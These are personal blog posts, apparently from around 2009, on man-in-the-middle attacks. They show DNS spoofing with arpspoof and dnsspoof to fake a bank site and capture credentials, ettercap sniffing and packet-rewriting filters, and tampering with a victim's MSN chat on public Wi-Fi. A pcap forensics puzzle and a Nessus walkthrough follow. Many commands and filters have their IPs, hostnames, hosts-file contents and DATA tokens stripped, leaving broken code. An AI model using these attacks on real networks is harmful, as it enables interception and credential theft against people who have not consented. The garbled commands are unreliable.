# tcpdump -i eth1 '((tcp) and ((dst net 192.168) and (not dst host'

Resources/Good reading:

DNS spoofing (dnsspoof)

When a web browser requests a page such as '', it sends a dns request to a dns server to resolve the dns name, i.e, '', to its associated ip address. Where dns poisoning comes into play is when that request is sent the web browser is now in a wait for the dns servers reply/answer to the dns query. An attacker can see the request going out and in turn send its own dns reply/answer before the dns server does. Its a race against time and usually if the attacker is on the same subnet or network (1 or a few hops away) from system that issending the request, then usually the attackers response should reach its intended destination before any outside reply does. The dnager in this attack is when the attacker spoofs important websites such as your bank website. His/Her fake web server will have exactly the same interface than the real bank web site. So, the attacker can wait for you to enter your credentials on his website to capture them.


**(can also use for this ettercap)

First you need to create what is called a hosts file. In your text editor type the following: **

Save this file 'hosts.txt'
Perform a MITM (man in the middle attack):
# arpspoof -i eht0 -t
# arpspoof -i eth0 -t

Start spoofing with these commands:
# dnsspoof -i eth0 -f hosts.txt

or if you were sniffing an entire network and not just sniff between the gaetway and one host, you can use a tcpdump filter expression in the end.
# dnsspoof -i eth0 -f hosts.txt host

Resources/Good reading:

More On Ettercap plus Filter examples

This post is a follow up to my previous post on using and ettercap filter to change some text on the fly throughout an MSN conversation. Finding information on google about ettercap filters wasn't as easy as i would have anticipated, took me several minutes to find useabll info. Below is a summary of my findings and mainly aims as a reference or cheatsheet if you will, for some of its popular uses.

Just to recap, if you havent done your homework on the basics of ettercap yet

Basic Sniffing

Network sniffing in quiet text mode with no arp poisoning or arp scan. Ettercap would listen on the eth0 interface and display only information of interests like passwords.

ettercap –Tzq –i eth0

To sniff traffic between 2 hosts:

ettercap -i eth0 –Tq –M ARP:remote /victim_ip_A/ /victim_ip_B/

What interface to listen on
Run in quiet, Text-mode
'-M ARP:remote':
Perform Man-in-Middle-Mode (MITM) arp spoof between two points or nodes in the network, in our example above, between /victim_ip_A/ /victim_ip_B/.

Sniff multiple hosts by be in the middle of network/nodes and the gateway:

ettercap –i eth0 –T –M arp / / /

Capture traffic on a certain port only:

ettercap –i eth0 –T –M arp / / /

To sniff traffic between all hosts on the network:

ettercap –T –M arp // //

Note that the above is generally not recommend. Do so would result in network performance degradation as you network card is not powerful enough to process all the network traffic (assuming this a reasonably sized network). A network like this would suffer from packet lots and congestion since their would be alot of retransmissions.

Ettercap is capable of:
• sniffing HTTPS
• Injecting traffic
• OS fingerprinting

Logging The Output

ettercap –Tq –L filename -M ARP:remote /ip_address_A/ /ip_address_B/

Other useful options
-F use preconfigured or custom filters
-P use plugin (to view plugins use ettercap –TQ press p to view the plugin menu)
-c Compress the output (gzip)

More on Ettercap Filters:
Monitoring web traffic (port 80):
Note: When you monitor web traffic, the packets that you see may come accross in an encoded form. Ettercap needs plain-text traffic in order to effectively filter what it needs to. The encoding type that web pages use from my observations(im not sure or aware of any others) is "Accept-Encoding: gzip, deflate"

Below is a filter that Zaps the encoding to force plain-text communication:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(, "gzip")) {
replace("gzip", " "); # note: four spaces in the replacement string
msg("whited out gzip\n");

if (ip.proto == TCP && tcp.dst == 80) {
if (search(, "deflate")) {
replace("deflate", " "); # note: seven spaces in the replacement string
msg("whited out deflate\n");

Replacing text in a packet:
if (ip.proto == TCP && search(, "lol")){
replace("lol", "smh");
msg("filter ran");


Display a message if the tcp port is 22:
if (ip.proto == TCP) {
if (tcp.src == 22 || tcp.dst == 22) {
msg("SSH packet\n");

Log all telnet traffic, also execute ./program on every packet:
if (ip.proto == TCP) {
if (tcp.src == 23 || tcp.dst == 23) {
log(, "./logfile.log");

Log all traffic except http:
if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
log(, "./logfile.log");

Some operation on the payload of the packet:
if ( + 20 == 0x4142 ) { + 20 = 0x4243;
} else { = "modified"; + 20 = 0x4445;

Drop any packet containing "ettercap":
if (search(, "ettercap")) {
msg("some one is talking about us...\n");

Log ssh decrypted packets matching the regexp
if (ip.proto == TCP) {
if (tcp.src == 22 || tcp.dst == 22) {
if (regex(, ".*login.*")) {
log(, "./decrypted_log");

Dying packets:
if (ip.ttl <>
msg("The packet will die soon\n");

String comparison at a given offset:
if ( + 40 == "ette") {
log(, "./logfile");

Inject a file after a specific packet:
if (tcp.src == 21 && search(, "root")) {

Replace the entire packet with another:
if (tcp.src == 23 && search(, "microsoft")) {

Filter only a specific ip address:
if (ip.src == '') {

Translate the port of the tcp packet from 80 to 81:
if (tcp.dst == 80) {
tcp.dst -= 1;
tcp.dst += 2;

Resources/Good reading:

Tuesday, November 24, 2009

Ettercap and Filters (Pwning an MSN convo)

Ettercap is a multi-purpose sniffer that can perform man in the middle attacks on a switched network. It can sniff live connections and modify some of a packets contents on the fly. What im going to show you is how you can modify certain words from an ongoing MSN convo. You are gonna have to be on the same network so a perfect scenario would be at an interet cafe or wireless hotspot.
You would need to create a filter that would tell ettercap to filter out 'lol' in our example to whatever we want, in this case 'smh'.

Creating the filter:
# touch msn.txt
open msn.txt in a text editor and type the following:
if (ip.proto == TCP && search(, "lol")) { replace("lol", "smh"); msg("filter ran"); }

Save and exit your work.
NB: Just to point out, there shouldn't be any space between the 'e' and '(' in the replace function, and '', its necessary for 'DATA' to be in all caps . This language is case sensitie so putting '' would not work.

Next you need to compile the msn.txt text into a format that ettercap can understand
# etterfilter -o msn.ef msn.txt

Now we are ready to run ettercap with our newly created filter.
#ettercap -Tq -M ARP:remote -i wlan0 -F msn.ef /victim_with_msn_ip/ /router_ip/

Thats all. Now jst wait for your victim to send or recieve an 'lol' in the convo. Just like magic 'lol' turns to 'smh'. Just note that when u type 'lol', its gonna show up as 'lol' on your end but on the other end of the convo, its gonna show up as 'smh' and vice versa. Now feel free to accossiate the word ettercap and awsome in the same sentence with ease.

In all my tests i found that you always have to perform a man in the middle attack (like arp cahce poisoning) to get the ettercap filters working. Without the arp cache, the ettercap console will say that the filter was ran but my packets were not modified or affected.

Forensic contest: Puzzle #1

I found this interesting website that post puzzles for interested indiviuals like myself to try and solve with the possiblilty of winning prizes too. The URL is In this blog, im gonna show you how to solve puzzle #1,

1. Download the required pcap file, evidence.pcap from the website
2. First thing i did was open up the pcap file in wireshark and applied a display filter to look at the traffic to whom anns computer, was involved in(ip.addr eq
3. Upon analysis of the first few packets i determined the name of Ann's im buddy was "Sec558user1"
4. I right clicked on the first packet then selected "Follow tcp stream"
5. Upon further analysis, i've determined that the first comment in the conversation was "Here's the secret recipe. I just downloaded it from the file server. Just copy to a thumb drive and you're good to go"
6. To find out the name of the file that was transferred, there are two ways i used to determine that.
  • Method 1 command: "# strings evidence.pcap |more". This method can take awhile and is not the best but eventaully i saw the filename "recipe.docx"
  • Method 2. First i used tcpflow to seperate the streams then ran them through xxd.
    command: "# tcpflow -r evidence.pcap". I noticed a communication line between ann's computer and another local but unknown ip of I then did "# xxd | more". Voila, recipe.docx is being sent to some unknown user using the OFT protocol
7. A simple google search got me the necessary bytes being asked for, "50 4B 03 04"
8. convert the necessary file to a post-script plain hexdump file for editing purposes, "# xxd -ps > hex.txt"
9. Open up the file in a text editor like kate and search for the magic bytes "504b0304". When you find these bytes removed everything before that then save the file.
10. run "# xxd -r -ps hex1.txt > recipe.docx". This converts the hex file back into a raw binary file. Bingo, we have our original file
  • An alternate way to do this, "# xxd -s +256 |xxd -s -256 -r > recipe.docx"
11. Get the MD5 sum of the file, "# md5sum recipe.docx", 8350582774e1d4dbe1d61d64c89e0ea1 recipe.docx
12. Using MS word to open the file you get:
Recipe for Disaster:
1 serving
4 cups sugar
2 cups water
In a medium saucepan, bring the water to a boil. Add sugar. Stir gently over low heat until sugar is fully dissolved. Remove the saucepan from heat. Allow to cool completely. Pour into gas tank. Repeat as necessary.


Nessus - Quick step by step to do a vulnerability scan

Nessus, in the network security realm is a comprehensive vulnerabilty scanner thats free for non commercial users. The entire goal of such a program is to aid a Systems Admin in identify vulnerabilities on his tested systems.

A few examples taking from :

  • Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets
Nessus can run on both Windows and Linux systems. On the linux system, It consists of the nessus server, nessusd, which does the scanning, and the nessus client NessusClient (or nessus on some systems i believe) that which controls scans and presents the vulnerability results to the user .

I had a task in getting Nessus installed on bactrack 4 but im not gonna get into that. Refer to the following link for instructions and don't ever forget your new best friend

BT4, 10.0.01:
# /etc/init.d/nessusd start # cd /opt/nessus/bin # ./NessusClient

On the 'Scan' tab click on the '+' button and enter in the host or range of hosts that you would like to scan by their respective IP addresses. Click on Save.

Click on the 'Connect' button to the bottom left of the screen. Click on the '+' button then Enter in the required information (remember the host is gonna be and port should remain 1241. The username and password would have been created in your nessus setup stages). Click on Save. Click on Connect. NessusClient is gonna attmep to connect to the nessus server at this point. Upon succestful connectivity, you should have the right hand '+' button enabled (would be disabled initially). Click on that '+' button. The next window should present you with a ton of options and settings at your disposal. I'd leave that up to you to determine whats right for you but the defaults should be fine for now to get things up and running. Click on Save. Then Click the Scan now button. You have now just performed a somewhat professional vulnerability audit of a system. When the scan is finished you would be presented with a report of nessus's findings. What you do from here onwards is up to you and you little imagination.

Resources/Good reading: